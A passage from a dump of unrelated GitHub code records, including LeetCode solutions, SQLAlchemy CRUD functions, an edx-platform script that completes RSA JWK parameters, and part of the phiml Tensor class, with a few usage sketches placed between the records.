cv2.imwrite(r'D:\zcd\CV\LicensePlate-master\3'+'/'+image_name,image)\n","repo_name":"eternity123-null/LicenseRecognition","sub_path":"ResNet-LPRNet/LicenseRec.py","file_name":"LicenseRec.py","file_ext":"py","file_size_in_byte":2013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
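A minimal usage sketch for DrawChinese above; the canvas and plate string are placeholders, and it assumes the MSJHL.TTC font file referenced in the helper is available next to the script:

import numpy
import cv2

canvas = numpy.zeros((200, 400, 3), dtype=numpy.uint8)            # blank BGR canvas
labeled = DrawChinese(canvas, "京A12345", (10, 80), fontSize=48)  # default fontColor (255, 0, 0) renders red
cv2.imwrite("labeled_plate_demo.png", labeled)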
+{"seq_id":"7996402174","text":"import inspect\nfrom mftoolbox.constants import Color as c\n\ndef error_stack(error, message):\n \"\"\"\n Prints an error message created by the user\n Args:\n context: context in which the error was generated\n error: name of the error\n message: message explaining the error\n\n Returns: only prints the error type, the explanatory message and the call list\n\n \"\"\"\n context = inspect.getframeinfo(inspect.currentframe(), context=1), inspect.getouterframes(inspect.currentframe(),context=1)\n error = \"Error: \" + error\n print(c.dark_red_background + c.bold + c.white + error + \" \" * (60 - len(error)) + c.end)\n print(message)\n print('Call list:')\n last = False\n for id1, item1 in enumerate(context[1]):\n if last:\n break\n item2 = item1[0]\n filename, lineno, function, code_context, code = inspect.getframeinfo(item2)\n if function == \"<module>\":\n last = True\n if function not in ('get_context', '__init__', 'error_stack'):\n function = function.replace(\"<module>\", \"__main__\")\n print(\"file: {}, line: {}, function: {}\".format(filename, lineno, function))\n exit(1)\n\nclass RaiseError(Exception):\n \"\"\"\n Raises a user-defined error\n \"\"\"\n\n def __init__(self, RaisedError, message):\n \"\"\"\n\n Args:\n RaisedError: name of the error\n message: message explaining the error\n \"\"\"\n error_stack(RaisedError, message)","repo_name":"Jeffkent01coder/trackphone","sub_path":"venv/lib/python3.8/site-packages/mftoolbox/raiseerror.py","file_name":"raiseerror.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
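A hypothetical usage sketch for RaiseError above (the config check is invented for illustration); since error_stack ends with exit(1), the process stops right after the report is printed:

def load_config(path):
    # the RaiseError constructor prints the report via error_stack and exits,
    # so nothing after this line runs when the check fails
    if not path.endswith('.json'):
        RaiseError('ConfigError', f'Expected a .json file, got: {path}')
    return path

load_config('settings.yaml')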
+{"seq_id":"11640615109","text":"\"\"\"\nLeetcode 40: Combination Sum II\nhttps://leetcode.com/problems/combination-sum-ii/\nApproach: Backtracking\n- Use a helper function to backtrack the possible combinations\n- The helper function takes in the index of the candidate to be considered\n and the current combination\n- For each candidate, we have 2 choices: either we use it or we don't\n- If we use it, we add it to the current combination and subtract it from\n the target. Then we recursively call the helper function with the next\n index and the new target, i.e. we don't consider the same candidate again\n- Due to the duplicates in the candidates, we need to skip the duplicates\n when we are considering the same candidate again\nAnalysis:\n- Time complexity: O(2^n) - n is the number of candidates\n- Space complexity: O(n)\n\"\"\"\nfrom typing import List\n\n\ndef combinationSum2(candidates: List[int], target: int) -> List[List[int]]:\n \"\"\" Recursive solution \"\"\"\n res = []\n candidates.sort()\n\n def backtrack(index, combination, target):\n if target == 0:\n res.append(combination.copy())\n return\n if target < 0 or index >= len(candidates):\n return\n\n candidate = candidates[index]\n\n next_target = target - candidate\n combination.append(candidate)\n backtrack(index + 1, combination, next_target)\n combination.pop()\n i = index + 1\n while i < len(candidates) and candidates[i] == candidates[index]:\n i += 1\n backtrack(i, combination, target)\n backtrack(0, [], target)\n return res\n\n\ndef combinationSum2Iterative(candidates: List[int], target: int) -> List[List[int]]:\n \"\"\" Iterative solution \"\"\"\n res = []\n candidates.sort()\n\n def backtrack(index, combination, target):\n if target == 0:\n res.append(combination)\n return\n if target < 0 or index >= len(candidates):\n return\n prev = -1\n for i in range(index, len(candidates)):\n candidate = candidates[i]\n if candidate == prev:\n continue\n if candidate <= target:\n backtrack(i + 1, combination + [candidate], target - candidate)\n prev = candidate\n backtrack(0, [], target)\n","repo_name":"ngugimuchangi/coding_challenges","sub_path":"leetcode/backtracking/combination_sum_ii.py","file_name":"combination_sum_ii.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
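A quick self-check for both variants, using the example input from the original problem statement:

if __name__ == "__main__":
    candidates, target = [10, 1, 2, 7, 6, 1, 5], 8
    expected = [[1, 1, 6], [1, 2, 5], [1, 7], [2, 6]]
    # copy the input because both implementations sort the list in place
    assert sorted(combinationSum2(list(candidates), target)) == expected
    assert sorted(combinationSum2Iterative(list(candidates), target)) == expected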
+{"seq_id":"34920275922","text":"\"\"\" CRUD operations for management of resources\n\"\"\"\nfrom sqlalchemy.orm import Session\nfrom models import Employee\nimport schemas\n\n\ndef get_employee(db_session: Session, employee_idir: str):\n \"\"\" Get employee by idir \"\"\"\n return db_session.query(Employee).filter(Employee.idir == employee_idir).first()\n\n\ndef get_employee_by_idir(db_session: Session, employee_idir: str):\n \"\"\" Get employee by idir \"\"\"\n return db_session.query(Employee).filter(Employee.idir == employee_idir).first()\n\n\ndef get_employees(db_session: Session):\n \"\"\" Get all employees \"\"\"\n list_of_emps = []\n list_of_records = db_session.query(Employee).all()\n for recd in list_of_records:\n emp = schemas.Employee(\n id=recd.id,\n idir=recd.idir,\n status=recd.status,\n location=recd.location,\n phone=recd.phone)\n list_of_emps.append(emp)\n return list_of_emps\n\n\ndef create_employee(db_session: Session, employee: schemas.EmployeeRequest):\n \"\"\" Create new employee \"\"\"\n new_employee = Employee(\n idir=employee.idir,\n status=employee.status,\n location=employee.location,\n phone=employee.phone)\n db_session.add(new_employee)\n db_session.commit()\n db_session.refresh(new_employee)\n return db_session.query(Employee).filter(Employee.idir == employee.idir).first()\n\n\ndef delete_employee(db_session: Session, employee_idir: str):\n \"\"\" Delete employee by idir \"\"\"\n db_session.query(Employee).filter(Employee.idir == employee_idir).delete()\n db_session.commit()\n return employee_idir\n\n\ndef update_employee(db_session: Session, employee: schemas.EmployeeRequest):\n \"\"\" Update employee by idir \"\"\"\n db_session.query(Employee).filter(Employee.idir == employee.idir).update(\n {\n Employee.status: employee.status,\n Employee.location: employee.location,\n Employee.phone: employee.phone\n }, synchronize_session=False)\n db_session.commit()\n return db_session.query(Employee).filter(Employee.idir == employee.idir).first()\n","repo_name":"bcgov/epr","sub_path":"api/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
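A hypothetical wiring sketch showing how these helpers are typically driven from a SQLAlchemy session; the engine URL and the EmployeeRequest field values are placeholders, and it assumes SQLAlchemy 1.4+ plus a declarative Employee model whose metadata can create the demo tables:

from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

from models import Employee
import schemas

engine = create_engine('sqlite:///:memory:')
Employee.metadata.create_all(engine)  # create the tables for this in-memory demo
SessionLocal = sessionmaker(bind=engine)

with SessionLocal() as session:
    create_employee(session, schemas.EmployeeRequest(
        idir='jdoe', status='in-office', location='Victoria', phone='555-0100'))
    assert get_employee_by_idir(session, 'jdoe').idir == 'jdoe'
    delete_employee(session, 'jdoe')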
+{"seq_id":"24592238810","text":"#!/usr/bin/env python3\n\"\"\"Derivatives\"\"\"\n\n\ndef poly_derivative(poly):\n \"\"\"Returns the derivative of the given polynomial coefficient list \"\"\"\n if type(poly) is not list or len(poly) == 0:\n return None\n derivate = []\n for i in range(len(poly)):\n if i >= 1:\n derivate.append(poly[i] * i)\n if len(derivate) == 0:\n derivate.append(0)\n return derivate\n","repo_name":"Luffy981/holbertonschool-machine_learning","sub_path":"math/0x02-calculus/10-matisse.py","file_name":"10-matisse.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
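Worked example: f(x) = 5 + 3x + x^3 is encoded as [5, 3, 0, 1], and its derivative f'(x) = 3 + 3x^2 comes back as [3, 0, 3]:

assert poly_derivative([5, 3, 0, 1]) == [3, 0, 3]
assert poly_derivative([7]) == [0]            # a constant differentiates to zero
assert poly_derivative('not a poly') is None  # non-list input is rejected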
+{"seq_id":"12617467093","text":"#!/usr/bin/env python3\n# Enhance a JWK to have all of its optional performance parameters.\n# Intended to be used on an RSA `JWT_PRIVATE_SIGNING_JWK`.\n#\n# This is needed for the change from pyjwkest to PyJWT, since the\n# former accepts a partial list of optional parameters but the latter\n# requires that they are either all present or all absent. The optional\n# parameters provide a performance boost.\n#\n# Usage: Key JSON accepted on stdin; enhanced key printed to stdout.\n\nimport json\nimport sys\n\nfrom jwt.algorithms import RSAAlgorithm\n\n\nprint(\"Paste the key's JSON, followed by a new line and Ctrl-D:\\n\", file=sys.stderr)\nold_jwk_data = json.loads(sys.stdin.read())\n\n# Clear out all of the precomputed private numbers\nfor param_key in ['p', 'q', 'dp', 'dq', 'qi']:\n if param_key in old_jwk_data:\n del old_jwk_data[param_key]\n\n# Ensure that there aren't any unexpected parameters\nexpected_remaining = {'kty', 'e', 'd', 'n', 'kid', 'key_ops'}\nunexpected_params = set(old_jwk_data.keys()) - expected_remaining\nif len(unexpected_params):\n print(\n f\"Unexpected parameters {unexpected_params} would be lost. Aborting script. \"\n \"If your key has additional parameters that are unrelated to the precomputed \"\n \"private numbers, then please add them to the `expected_remaining` variable \"\n \"and re-run the script. Please consider making a PR as well.\",\n file=sys.stderr\n )\n sys.exit(1)\n\n# Recompute private numbers\nnew_jwk_data = json.loads(RSAAlgorithm.to_jwk(RSAAlgorithm.from_jwk(old_jwk_data)))\n\n# Restore the kid (key ID) param, which gets lost in the process. This adds it\n# to the front of the dict. The params are actually in a really nice order in\n# the native ordering that comes out of the JWK, with metadata first, then the\n# core params (n, e, d), and then the precomputed values.\nfor restore_param in ['kid']:\n if restore_param in old_jwk_data:\n new_jwk_data = {restore_param: old_jwk_data[restore_param], **new_jwk_data}\n\n# Pretty-print so that the kid and modulus can be confirmed easily\nprint(\"\\n\\nEnhanced private key:\\n\", file=sys.stderr)\nprint(json.dumps(new_jwk_data, indent=4))\n","repo_name":"openedx/edx-platform","sub_path":"scripts/jwk-precompute-params.py","file_name":"jwk-precompute-params.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"}
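An optional sanity check, sketched under the assumption that the script's stdout was saved to a file named enhanced_jwk.json: the enhanced key should sign and verify exactly like the original.

import json
import jwt  # PyJWT
from jwt.algorithms import RSAAlgorithm

with open('enhanced_jwk.json') as f:  # hypothetical file holding the script's output
    key = RSAAlgorithm.from_jwk(json.load(f))

token = jwt.encode({'sub': 'test'}, key, algorithm='RS256')
claims = jwt.decode(token, key.public_key(), algorithms=['RS256'])
assert claims['sub'] == 'test'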
+{"seq_id":"30366614327","text":"import numbers\nimport warnings\nfrom contextlib import contextmanager\nfrom typing import Union, TypeVar\n\nfrom dataclasses import dataclass\nfrom typing import Tuple, Callable, List\n\nimport numpy\nimport numpy as np\n\nfrom ._magic_ops import PhiTreeNodeType, variable_attributes, copy_with, stack, pack_dims, expand\nfrom ._shape import (Shape,\n CHANNEL_DIM, BATCH_DIM, SPATIAL_DIM, EMPTY_SHAPE,\n parse_dim_order, shape_stack, merge_shapes, channel, concat_shapes, primal,\n SUPERSCRIPT, IncompatibleShapes, INSTANCE_DIM, batch, spatial, dual, instance, shape, DimFilter, non_batch, DEBUG_CHECKS)\nfrom ..backend import NoBackendFound, choose_backend, BACKENDS, get_precision, default_backend, convert as convert_, \\\n Backend, ComputeDevice, OBJECTS\nfrom ..backend._dtype import DType, combine_types\nfrom .magic import BoundDim, PhiTreeNode, slicing_dict\nfrom .magic import Shapable\n\n\nclass Tensor:\n \"\"\"\n Abstract base class to represent structured data of one data type.\n This class replaces the native tensor classes `numpy.ndarray`, `torch.Tensor`, `tensorflow.Tensor` or `jax.numpy.ndarray` as the main data container in Φ-ML.\n\n `Tensor` instances are different from native tensors in two important ways:\n\n * The dimensions of Tensors have *names* and *types*.\n * Tensors can have non-uniform shapes, meaning that the size of dimensions can vary along other dimensions.\n\n To check whether a value is a tensor, use `isinstance(value, Tensor)`.\n\n To construct a Tensor, use `phiml.math.tensor()`, `phiml.math.wrap()` or one of the basic tensor creation functions,\n see https://tum-pbs.github.io/PhiML/Math.html#tensor-creation .\n\n Tensors are not editable.\n When backed by an editable native tensor, e.g. a `numpy.ndarray`, do not edit the underlying data structure.\n \"\"\"\n\n def native(self, order: Union[str, tuple, list, Shape] = None, singleton_for_const=False):\n \"\"\"\n Returns a native tensor object with the dimensions ordered according to `order`.\n \n Transposes the underlying tensor to match the name order and adds singleton dimensions for new dimension names.\n If a dimension of the tensor is not listed in `order`, a `ValueError` is raised.\n\n Args:\n order: (Optional) Order of dimension names as comma-separated string, list or `Shape`.\n singleton_for_const: If `True`, dimensions along which values are guaranteed to be constant will not be expanded to their true size but returned as singleton dimensions.\n\n Returns:\n Native tensor representation, such as PyTorch tensor or NumPy array.\n\n Raises:\n ValueError if the tensor cannot be transposed to match target_shape\n \"\"\"\n raise NotImplementedError(self.__class__)\n\n def numpy(self, order: Union[str, tuple, list, Shape] = None) -> np.ndarray:\n \"\"\"\n Converts this tensor to a `numpy.ndarray` with dimensions ordered according to `order`.\n \n *Note*: Using this function breaks the autograd chain. 
The returned tensor is not differentiable.\n To get a differentiable tensor, use `Tensor.native()` instead.\n \n Transposes the underlying tensor to match the name order and adds singleton dimensions for new dimension names.\n If a dimension of the tensor is not listed in `order`, a `ValueError` is raised.\n\n If this `Tensor` is backed by a NumPy array, a reference to this array may be returned.\n\n See Also:\n `phiml.math.numpy()`\n\n Args:\n order: (Optional) Order of dimension names as comma-separated string, list or `Shape`.\n\n Returns:\n NumPy representation\n\n Raises:\n ValueError if the tensor cannot be transposed to match target_shape\n \"\"\"\n native = self.native(order=order)\n return choose_backend(native).numpy(native)\n\n def __array__(self, dtype=None): # NumPy conversion\n if self.rank > 1:\n warnings.warn(\"Automatic conversion of Φ-ML tensors to NumPy can cause problems because the dimension order is not guaranteed.\", SyntaxWarning, stacklevel=3)\n return self.numpy(self._shape)\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs): # NumPy interface\n if len(inputs) != 2:\n return NotImplemented\n if ufunc.__name__ == 'multiply':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x * y, lambda x, y: choose_backend(x, y).mul(x, y), 'mul', '*')\n else:\n return self._op2(inputs[0], lambda x, y: y * x, lambda x, y: choose_backend(x, y).mul(y, x), 'rmul', '*')\n if ufunc.__name__ == 'add':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x + y, lambda x, y: choose_backend(x, y).add(x, y), 'add', '+')\n else:\n return self._op2(inputs[0], lambda x, y: y + x, lambda x, y: choose_backend(x, y).add(y, x), 'radd', '+')\n if ufunc.__name__ == 'subtract':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x - y, lambda x, y: choose_backend(x, y).sub(x, y), 'add', '-')\n else:\n return self._op2(inputs[0], lambda x, y: y - x, lambda x, y: choose_backend(x, y).sub(y, x), 'rsub', '-')\n if ufunc.__name__ in ['divide', 'true_divide']:\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x / y, lambda x, y: choose_backend(x, y).div(x, y), 'true_divide', '/')\n else:\n return self._op2(inputs[0], lambda x, y: y / x, lambda x, y: choose_backend(x, y).div(y, x), 'r_true_divide', '/')\n if ufunc.__name__ == 'floor_divide':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x // y, lambda x, y: choose_backend(x, y).floordiv(x, y), 'floor_divide', '//')\n else:\n return self._op2(inputs[0], lambda x, y: y // x, lambda x, y: choose_backend(x, y).floordiv(y, x), 'r_floor_divide', '//')\n if ufunc.__name__ == 'remainder':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x % y, lambda x, y: choose_backend(x, y).mod(x, y), 'remainder', '%')\n else:\n return self._op2(inputs[0], lambda x, y: y % x, lambda x, y: choose_backend(x, y).mod(y, x), 'r_remainder', '%')\n if ufunc.__name__ == 'power':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x ** y, lambda x, y: choose_backend(x, y).pow(x, y), 'power', '**')\n else:\n return self._op2(inputs[0], lambda x, y: y ** x, lambda x, y: choose_backend(x, y).pow(y, x), 'r_power', '**')\n if ufunc.__name__ == 'equal':\n if _EQUALITY_REDUCE[-1] == 'ref':\n return wrap(inputs[0] is inputs[1])\n elif _EQUALITY_REDUCE[-1] == 'shape_and_value':\n if set(inputs[0].shape) != set(inputs[1].shape):\n return wrap(False)\n from ._ops import close\n return wrap(close(inputs[0], inputs[1], rel_tolerance=0, abs_tolerance=0))\n if inputs[0] is 
self:\n return self._op2(inputs[1], lambda x, y: x == y, lambda x, y: choose_backend(x, y).equal(x, y), 'equal', '==')\n else:\n return self._op2(inputs[0], lambda x, y: y == x, lambda x, y: choose_backend(x, y).equal(y, x), 'r_equal', '==')\n if ufunc.__name__ == 'not_equal':\n if _EQUALITY_REDUCE[-1] == 'ref':\n return wrap(inputs[0] is not inputs[1])\n elif _EQUALITY_REDUCE[-1] == 'shape_and_value':\n if set(inputs[0].shape) != set(inputs[1].shape):\n return wrap(True)\n from ._ops import close\n return wrap(not close(inputs[0], inputs[1], rel_tolerance=0, abs_tolerance=0))\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x != y, lambda x, y: choose_backend(x, y).not_equal(x, y), 'equal', '!=')\n else:\n return self._op2(inputs[0], lambda x, y: y != x, lambda x, y: choose_backend(x, y).not_equal(y, x), 'r_equal', '!=')\n if ufunc.__name__ == 'greater':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x > y, lambda x, y: choose_backend(x, y).greater_than(x, y), 'greater', '>')\n else:\n return self._op2(inputs[0], lambda x, y: y > x, lambda x, y: choose_backend(x, y).greater_than(y, x), 'r_greater', '>')\n if ufunc.__name__ == 'greater_equal':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x >= y, lambda x, y: choose_backend(x, y).greater_or_equal(x, y), 'greater_equal', '>=')\n else:\n return self._op2(inputs[0], lambda x, y: y >= x, lambda x, y: choose_backend(x, y).greater_or_equal(y, x), 'r_greater_equal', '>=')\n if ufunc.__name__ == 'less':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x < y, lambda x, y: choose_backend(x, y).greater_than(y, x), 'less', '<')\n else:\n return self._op2(inputs[0], lambda x, y: y < x, lambda x, y: choose_backend(x, y).greater_than(x, y), 'r_less', '<')\n if ufunc.__name__ == 'less_equal':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x <= y, lambda x, y: choose_backend(x, y).greater_or_equal(y, x), 'less_equal', '<=')\n else:\n return self._op2(inputs[0], lambda x, y: y <= x, lambda x, y: choose_backend(x, y).greater_or_equal(x, y), 'r_less_equal', '<=')\n if ufunc.__name__ == 'left_shift':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x << y, lambda x, y: choose_backend(x, y).shift_bits_left(x, y), 'left_shift', '<<')\n else:\n return self._op2(inputs[0], lambda x, y: y << x, lambda x, y: choose_backend(x, y).shift_bits_left(y, x), 'r_left_shift', '<<')\n if ufunc.__name__ == 'right_shift':\n if inputs[0] is self:\n return self._op2(inputs[1], lambda x, y: x >> y, lambda x, y: choose_backend(x, y).shift_bits_right(x, y), 'right_shift', '>>')\n else:\n return self._op2(inputs[0], lambda x, y: y >> x, lambda x, y: choose_backend(x, y).shift_bits_right(y, x), 'r_right_shift', '>>')\n raise NotImplementedError(f\"NumPy function '{ufunc.__name__}' is not compatible with Φ-ML tensors.\")\n\n @property\n def dtype(self) -> DType:\n \"\"\" Data type of the elements of this `Tensor`. \"\"\"\n raise NotImplementedError(self.__class__)\n\n @property\n def shape(self) -> Shape:\n \"\"\" The `Shape` lists the dimensions with their sizes, names and types. 
\"\"\"\n raise NotImplementedError(self.__class__)\n\n @property\n def default_backend(self) -> Backend:\n from ._ops import choose_backend_t\n return choose_backend_t(self)\n\n def _with_shape_replaced(self, new_shape: Shape):\n raise NotImplementedError(self.__class__)\n\n def _with_natives_replaced(self, natives: list):\n \"\"\" Replaces all n _natives() of this Tensor with the first n elements of the list and removes them from the list. \"\"\"\n raise NotImplementedError(self.__class__)\n\n @property\n def rank(self) -> int:\n \"\"\"\n Number of explicit dimensions of this `Tensor`. Equal to `tensor.shape.rank`.\n This replaces [`numpy.ndarray.ndim`](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.ndim.html) /\n [`torch.Tensor.dim`](https://pytorch.org/docs/master/generated/torch.Tensor.dim.html) /\n [`tf.rank()`](https://www.tensorflow.org/api_docs/python/tf/rank) /\n [`jax.numpy.ndim()`](https://jax.readthedocs.io/en/latest/_autosummary/jax.numpy.ndim.html).\n \"\"\"\n return self.shape.rank\n\n @property\n def _is_tracer(self) -> bool:\n \"\"\"\n Tracers store additional internal information.\n They should not be converted to `native()` in intermediate operations.\n \n TensorStack prevents performing the actual stack operation if one of its component tensors is special.\n \"\"\"\n raise NotImplementedError(self.__class__)\n\n def _to_dict(self):\n return cached(self)._to_dict()\n\n def __len__(self):\n return self.shape.volume if self.rank == 1 else NotImplemented\n\n def __bool__(self):\n assert self.rank == 0, f\"Cannot convert tensor with non-empty shape {self.shape} to bool. Use tensor.any or tensor.all instead.\"\n from ._ops import all_\n if not self.default_backend.supports(Backend.jit_compile): # NumPy\n return bool(self.native()) if self.rank == 0 else bool(all_(self).native())\n else:\n # __bool__ does not work with TensorFlow tracing.\n # TensorFlow needs to see a tf.Tensor in loop conditions but won't allow bool() invocations.\n # However, this function must always return a Python bool.\n raise AssertionError(\"To evaluate the boolean value of a Tensor, use 'Tensor.all'.\")\n\n @property\n def all(self):\n \"\"\" Whether all values of this `Tensor` are `True` as a native bool. \"\"\"\n from ._ops import all_, cast\n if self.rank == 0:\n return cast(self, DType(bool)).native()\n else:\n return all_(self, dim=self.shape).native()\n\n @property\n def any(self):\n \"\"\" Whether this `Tensor` contains a `True` value as a native bool. \"\"\"\n from ._ops import any_, cast\n if self.rank == 0:\n return cast(self, DType(bool)).native()\n else:\n return any_(self, dim=self.shape).native()\n\n @property\n def mean(self):\n \"\"\" Mean value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import mean\n return mean(self, dim=self.shape).native()\n\n @property\n def finite_mean(self):\n \"\"\" Mean value of all finite values in this `Tensor` as a native scalar. \"\"\"\n from ._ops import finite_mean\n return finite_mean(self, dim=self.shape).native()\n\n @property\n def std(self):\n \"\"\" Standard deviation of this `Tensor` as a native scalar. \"\"\"\n from ._ops import std\n return std(self, dim=self.shape).native()\n\n @property\n def sum(self):\n \"\"\" Sum of all values of this `Tensor` as a native scalar. \"\"\"\n from ._ops import sum_\n return sum_(self, dim=self.shape).native()\n\n @property\n def finite_sum(self):\n \"\"\" Sum of all finite values of this `Tensor` as a native scalar. 
\"\"\"\n from ._ops import finite_sum\n return finite_sum(self, dim=self.shape).native()\n\n @property\n def min(self):\n \"\"\" Minimum value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import min_\n return min_(self, dim=self.shape).native()\n\n @property\n def finite_min(self):\n \"\"\" Minimum finite value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import finite_min\n return finite_min(self, dim=self.shape).native()\n\n @property\n def max(self):\n \"\"\" Maximum value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import max_\n return max_(self, dim=self.shape).native()\n\n @property\n def finite_max(self):\n \"\"\" Maximum finite value of this `Tensor` as a native scalar. \"\"\"\n from ._ops import finite_max\n return finite_max(self, dim=self.shape).native()\n\n @property\n def real(self) -> 'Tensor':\n \"\"\"\n Returns the real part of this tensor.\n\n See Also:\n `phiml.math.real()`\n \"\"\"\n from ._ops import real\n return real(self)\n\n @property\n def imag(self) -> 'Tensor':\n \"\"\"\n Returns the imaginary part of this tensor.\n If this tensor does not store complex numbers, returns a zero tensor with the same shape and dtype as this tensor.\n\n See Also:\n `phiml.math.imag()`\n \"\"\"\n from ._ops import imag\n return imag(self)\n\n @property\n def available(self) -> bool:\n \"\"\"\n A tensor is available if it stores concrete values and these can currently be read.\n\n Tracers used inside jit compilation are typically not available.\n\n See Also:\n `phiml.math.jit_compile()`.\n \"\"\"\n if self._is_tracer:\n return False\n natives = self._natives()\n natives_available = [choose_backend(native).is_available(native) for native in natives]\n return all(natives_available)\n\n @property\n def device(self) -> Union[ComputeDevice, None]:\n \"\"\"\n Returns the `ComputeDevice` that this tensor is allocated on.\n The device belongs to this tensor's `default_backend`.\n\n See Also:\n `Tensor.default_backend`.\n \"\"\"\n natives = self._natives()\n if not natives:\n return None\n return self.default_backend.get_device(natives[0])\n\n def __int__(self):\n return int(self.native()) if self.shape.volume == 1 else NotImplemented\n\n def __float__(self):\n return float(self.native()) if self.shape.volume == 1 else NotImplemented\n\n def __complex__(self):\n return complex(self.native()) if self.shape.volume == 1 else NotImplemented\n\n def __index__(self):\n assert self.shape.volume == 1, f\"Only scalar tensors can be converted to index but has shape {self.shape}\"\n assert self.dtype.kind == int, f\"Only int tensors can be converted to index but dtype is {self.dtype}\"\n return int(self.native())\n\n def __repr__(self):\n return format_tensor(self, PrintOptions())\n\n def _repr_pretty_(self, printer, cycle):\n printer.text(format_tensor(self, PrintOptions(colors=DEFAULT_COLORS)))\n\n def __format__(self, format_spec: str):\n if BROADCAST_FORMATTER.values is not None:\n return BROADCAST_FORMATTER.register_formatted(self, format_spec)\n specs = format_spec.split(':')\n layout_ = 'auto'\n for possible_layout in ['summary', 'full', 'row', 'numpy']:\n if possible_layout in specs:\n assert layout_ == 'auto', f\"Two layout identifiers encountered in '{format_spec}'\"\n layout_ = possible_layout\n include_shape = 'shape' in specs or (False if 'no-shape' in specs else None)\n include_dtype = 'dtype' in specs or (False if 'no-dtype' in specs else None)\n color = 'color' in specs or (False if 'no-color' in specs else None)\n threshold = 8\n float_format = None\n 
for spec in specs:\n if spec.startswith('threshold='):\n threshold = int(spec[len('threshold='):])\n elif '.' in spec:\n float_format = spec\n result = format_tensor(self, PrintOptions(layout_, float_format, threshold, color, include_shape, include_dtype))\n return result\n\n def __getitem__(self, item) -> 'Tensor':\n if isinstance(item, Tensor):\n if item.dtype.kind == bool:\n from ._ops import boolean_mask\n return boolean_mask(self, item.shape, item)\n elif item.dtype.kind == int:\n from ._ops import gather\n return gather(self, item)\n else:\n raise AssertionError(f\"Index tensor must be of dtype int (gather) or bool (boolean_mask) but got {item}\")\n item = slicing_dict(self, item)\n selections = {}\n sliced = self\n for dim, selection in item.items():\n if dim not in self.shape:\n continue\n selection = self.shape.prepare_gather(dim, selection)\n # Either handle slicing directly or add it to the dict\n if isinstance(selection, (tuple, list)):\n from ._magic_ops import stack\n result = [sliced[{dim: i}] for i in selection]\n stack_dim = sliced.shape[dim].after_gather({dim: selection})\n sliced = stack(result, stack_dim)\n elif isinstance(selection, Tensor) and selection.dtype.kind == bool:\n from ._ops import boolean_mask\n sliced = boolean_mask(sliced, dim, selection)\n elif isinstance(selection, Tensor) and selection.dtype.kind == int:\n from ._ops import gather\n sliced = gather(sliced, selection, dims=dim)\n else:\n selections[dim] = selection\n return sliced._getitem(selections) if selections else sliced\n\n def _getitem(self, selection: dict) -> 'Tensor':\n \"\"\"\n Slice the tensor along specified dimensions.\n\n Args:\n selection: dim_name: str -> Union[int, slice]\n selection: dict: \n\n Returns:\n\n \"\"\"\n raise NotImplementedError()\n\n def __setitem__(self, key, value):\n raise SyntaxError(\"Tensors are not editable to preserve the autodiff chain. This feature might be added in the future. 
To update part of a tensor, use math.where() or math.scatter()\")\n\n def __unstack__(self, dims: Tuple[str, ...]) -> Tuple['Tensor', ...]: # from phiml.math.magic.Sliceable\n if len(dims) == 1:\n return self._unstack(dims[0])\n else:\n return NotImplemented\n\n def _unstack(self, dim: str):\n \"\"\"\n Splits this tensor along the specified dimension.\n The returned tensors have the same dimensions as this tensor save the unstacked dimension.\n\n Raises an error if the dimension is not part of the `Shape` of this `Tensor`.\n\n See Also:\n `TensorDim.unstack()`\n\n Args:\n dim: name of dimension to unstack\n\n Returns:\n tuple of tensors\n\n \"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def __stack__(values: tuple, dim: Shape, **_kwargs) -> 'Tensor':\n from ._ops import stack_tensors\n return stack_tensors(values, dim)\n\n def __expand__(self, dims: Shape, **kwargs) -> 'Tensor':\n return expand_tensor(self, dims)\n\n @staticmethod\n def __concat__(values: tuple, dim: str, **kwargs) -> 'Tensor':\n from ._ops import concat_tensor\n return concat_tensor(values, dim)\n\n def __replace_dims__(self, dims: Tuple[str, ...], new_dims: Shape, **kwargs) -> 'Tensor':\n from ._magic_ops import rename_dims\n return self._with_shape_replaced(rename_dims(self.shape, dims, new_dims))\n\n def __unpack_dim__(self, dim: str, unpacked_dims: Shape, **kwargs) -> 'Tensor':\n if self.shape.is_uniform:\n native = self.native(self.shape.names)\n new_shape = self.shape.without(dim)\n i = self.shape.index(dim)\n for d in unpacked_dims:\n new_shape = new_shape._expand(d, pos=i)\n i += 1\n native_reshaped = choose_backend(native).reshape(native, new_shape.sizes)\n return NativeTensor(native_reshaped, new_shape)\n else:\n tensors = self._tensors\n if dim == self._stack_dim.name:\n for udim in unpacked_dims:\n tensors = [TensorStack(tensors[o::len(tensors)//udim.size], udim) for o in range(len(tensors)//udim.size)]\n assert len(tensors) == 1\n return tensors[0]\n raise NotImplementedError\n\n def __pack_dims__(self, dims: Tuple[str, ...], packed_dim: Shape, pos: Union[int, None], **kwargs) -> 